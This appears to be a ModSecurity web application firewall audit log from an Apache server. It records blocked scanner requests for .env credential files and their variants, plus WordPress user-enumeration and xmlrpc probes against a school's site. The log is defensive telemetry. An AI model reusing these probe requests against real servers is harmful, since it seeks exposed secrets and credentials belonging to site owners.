[30/Apr/2025:21:04:51 +0700] aBIuAzsHLQ2TK6eM3erKGgAAAJY 103.236.140.4 51914 103.236.140.4 8181
--43e63d04-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.144
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.144
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept-Charset: utf-8
--43e63d04-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43e63d04-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746021891683717 640 (- - -)
Stopwatch2: 1746021891683717 640; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=59, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--43e63d04-Z--
--2ec5f51f-A--
[30/Apr/2025:22:49:46 +0700] aBJGmtmPDA_SdVd56wD4yAAAANg 103.236.140.4 57522 103.236.140.4 8181
--2ec5f51f-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://www.google.com
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.85.204
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.85.204
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
--2ec5f51f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2ec5f51f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1746028186717470 3210 (- - -)
Stopwatch2: 1746028186717470 3210; combined=1802, p1=492, p2=1281, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2ec5f51f-Z--
--71469047-A--
[30/Apr/2025:22:49:54 +0700] aBJGoj1td-6YjlnYDRKUKwAAAAs 103.236.140.4 57932 103.236.140.4 8181
--71469047-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 156.233.85.204
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 156.233.85.204
X-Forwarded-Proto: https
Connection: close
Content-Length: 136
Content-Type: text/plain; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26)
--71469047-C--
demo.sayHello
--71469047-F--
HTTP/1.1 301 Moved Permanently
Location: https://www.smkn22jakarta.sch.id/xmlrpc.php
Content-Length: 251
Connection: close
Content-Type: text/html; charset=iso-8859-1
--71469047-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1746028194136676 6265 (- - -)
Stopwatch2: 1746028194136676 6265; combined=4575, p1=612, p2=3720, p3=31, p4=36, p5=102, sr=118, sw=74, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--71469047-Z--
--5c22870c-A--
[01/May/2025:02:48:20 +0700] aBJ-hDsHLQ2TK6eM3erE6QAAAI4 103.236.140.4 33516 103.236.140.4 8181
--5c22870c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4
Accept-Charset: utf-8
--5c22870c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5c22870c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746042500203042 855 (- - -)
Stopwatch2: 1746042500203042 855; combined=388, p1=351, p2=0, p3=0, p4=0, p5=37, sr=168, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5c22870c-Z--
--9a511d48-A--
[01/May/2025:03:12:13 +0700] aBKEHdBN0baiHx4WjiYfNQAAAEg 103.236.140.4 55054 103.236.140.4 8181
--9a511d48-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba
Accept-Charset: utf-8
--9a511d48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a511d48-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746043933462859 627 (- - -)
Stopwatch2: 1746043933462859 627; combined=235, p1=206, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a511d48-Z--
--724fd218-A--
[01/May/2025:03:32:05 +0700] aBKIxeVeTgVPHjrSAYCpBwAAAAw 103.236.140.4 53168 103.236.140.4 8181
--724fd218-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.105 Safari/537.36 Vivaldi/2.4.1488.38
Accept-Charset: utf-8
--724fd218-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--724fd218-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746045125142698 829 (- - -)
Stopwatch2: 1746045125142698 829; combined=327, p1=291, p2=0, p3=0, p4=0, p5=36, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--724fd218-Z--
--8f009708-A--
[01/May/2025:04:04:27 +0700] aBKQW-VeTgVPHjrSAYCs2wAAAAg 103.236.140.4 60942 103.236.140.4 8181
--8f009708-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.154.252.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.154.252.208
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--8f009708-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8f009708-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746047067126599 882 (- - -)
Stopwatch2: 1746047067126599 882; combined=375, p1=337, p2=0, p3=0, p4=0, p5=38, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8f009708-Z--
--b3c83708-A--
[01/May/2025:04:04:28 +0700] aBKQXMVMAgMJpNzaVtJUuwAAAFA 103.236.140.4 60950 103.236.140.4 8181
--b3c83708-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.154.252.208
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.154.252.208
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--b3c83708-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b3c83708-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746047068257946 817 (- - -)
Stopwatch2: 1746047068257946 817; combined=330, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b3c83708-Z--
--8e135b7d-A--
[01/May/2025:04:55:32 +0700] aBKcVCgtr0Qsi1mFAsO-XwAAAIk 103.236.140.4 50940 103.236.140.4 8181
--8e135b7d-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.71.77.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.71.77.17
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--8e135b7d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8e135b7d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746050132983763 840 (- - -)
Stopwatch2: 1746050132983763 840; combined=322, p1=283, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8e135b7d-Z--
--59d0b77f-A--
[01/May/2025:05:35:47 +0700] aBKlw8VMAgMJpNzaVtJb5wAAAEg 103.236.140.4 60372 103.236.140.4 8181
--59d0b77f-B--
GET /.env.stage HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--59d0b77f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--59d0b77f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052547129567 791 (- - -)
Stopwatch2: 1746052547129567 791; combined=362, p1=326, p2=0, p3=0, p4=0, p5=36, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--59d0b77f-Z--
--3b817077-A--
[01/May/2025:05:35:47 +0700] aBKlw8VMAgMJpNzaVtJb6QAAAEs 103.236.140.4 60378 103.236.140.4 8181
--3b817077-B--
GET /.env.test HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--3b817077-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3b817077-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052547780401 765 (- - -)
Stopwatch2: 1746052547780401 765; combined=298, p1=262, p2=0, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3b817077-Z--
--492ada66-A--
[01/May/2025:05:35:48 +0700] aBKlxOVeTgVPHjrSAYCzxQAAAAw 103.236.140.4 60380 103.236.140.4 8181
--492ada66-B--
GET /.env.backup HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--492ada66-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--492ada66-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052548434919 745 (- - -)
Stopwatch2: 1746052548434919 745; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--492ada66-Z--
--b5ff8672-A--
[01/May/2025:05:35:49 +0700] aBKlxeVeTgVPHjrSAYCzxgAAAAs 103.236.140.4 60386 103.236.140.4 8181
--b5ff8672-B--
GET /.env.bak HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--b5ff8672-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b5ff8672-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052549081501 719 (- - -)
Stopwatch2: 1746052549081501 719; combined=325, p1=291, p2=0, p3=0, p4=0, p5=33, sr=127, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b5ff8672-Z--
--d3d4bd72-A--
[01/May/2025:05:35:49 +0700] aBKlxcVMAgMJpNzaVtJb6wAAAE0 103.236.140.4 60388 103.236.140.4 8181
--d3d4bd72-B--
GET /.env.dev HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--d3d4bd72-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d3d4bd72-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052549729394 709 (- - -)
Stopwatch2: 1746052549729394 709; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d3d4bd72-Z--
--437c1d79-A--
[01/May/2025:05:35:50 +0700] aBKlxuVeTgVPHjrSAYCzxwAAAAo 103.236.140.4 60394 103.236.140.4 8181
--437c1d79-B--
GET /build/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--437c1d79-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--437c1d79-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052550377082 728 (- - -)
Stopwatch2: 1746052550377082 728; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=92, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--437c1d79-Z--
--dce33d24-A--
[01/May/2025:05:35:51 +0700] aBKlx8VMAgMJpNzaVtJb7AAAAE8 103.236.140.4 60400 103.236.140.4 8181
--dce33d24-B--
GET /.env.default HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--dce33d24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--dce33d24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052551032922 794 (- - -)
Stopwatch2: 1746052551032922 794; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--dce33d24-Z--
--4e763f2e-A--
[01/May/2025:05:35:51 +0700] aBKlx8VMAgMJpNzaVtJb7gAAAFM 103.236.140.4 60406 103.236.140.4 8181
--4e763f2e-B--
GET /.env.live HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--4e763f2e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4e763f2e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052551687480 720 (- - -)
Stopwatch2: 1746052551687480 720; combined=276, p1=234, p2=0, p3=0, p4=0, p5=42, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4e763f2e-Z--
--4601d456-A--
[01/May/2025:05:35:52 +0700] aBKlyOVeTgVPHjrSAYCzyQAAABA 103.236.140.4 60410 103.236.140.4 8181
--4601d456-B--
GET /.env.sandbox HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--4601d456-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4601d456-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052552335144 739 (- - -)
Stopwatch2: 1746052552335144 739; combined=329, p1=291, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4601d456-Z--
--e1c2c11b-A--
[01/May/2025:05:35:52 +0700] aBKlyOVeTgVPHjrSAYCzygAAAA4 103.236.140.4 60412 103.236.140.4 8181
--e1c2c11b-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 179.43.152.115
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 179.43.152.115
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--e1c2c11b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e1c2c11b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746052552984273 640 (- - -)
Stopwatch2: 1746052552984273 640; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e1c2c11b-Z--
--b38ce426-A--
[01/May/2025:07:21:07 +0700] aBK-c-VeTgVPHjrSAYC9AQAAAAQ 103.236.140.4 60430 103.236.140.4 8181
--b38ce426-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Accept-Charset: utf-8
--b38ce426-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b38ce426-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1746058867700837 839 (- - -)
Stopwatch2: 1746058867700837 839; combined=366, p1=311, p2=0, p3=0, p4=0, p5=55, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b38ce426-Z--
--1af51f16-A--
